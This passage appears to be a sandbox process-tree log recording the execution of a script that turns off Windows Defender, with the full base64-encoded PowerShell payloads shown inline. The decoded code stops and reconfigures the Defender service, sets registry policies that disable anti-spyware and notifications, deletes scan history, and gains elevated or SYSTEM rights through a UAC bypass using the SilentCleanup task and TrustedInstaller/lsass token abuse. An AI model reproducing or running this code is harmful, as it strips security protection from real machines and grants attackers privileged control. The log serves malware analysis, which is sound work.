AHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 980 cmdline: "C:\Windows\system32\sc.exe" qc windefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

cmd.exe (PID: 3940 cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

whoami.exe (PID: 4336 cmdline: "C:\Windows\system32\whoami.exe" /groups MD5: 801D9A1C1108360B84E60A457D5A773A)

net1.exe (PID: 2604 cmdline: "C:\Windows\system32\net1.exe" start TrustedInstaller MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

net1.exe (PID: 6644 cmdline: "C:\Windows\system32\net1.exe" start lsass MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

powershell.exe (PID: 2304 cmdline: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6224 cmdline: "C:\Windows\system32\sc.exe" qc windefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

cmd.exe (PID: 2520 cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

whoami.exe (PID: 6644 cmdline: "C:\Windows\system32\whoami.exe" /groups MD5: 801D9A1C1108360B84E60A457D5A773A)

net1.exe (PID: 3140 cmdline: "C:\Windows\system32\net1.exe" stop windefend MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

sc.exe (PID: 3128 cmdline: "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

powershell.exe (PID: 2828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1516 cmdline: "C:\Windows\system32\sc.exe" qc windefend MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

cmd.exe (PID: 2520 cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

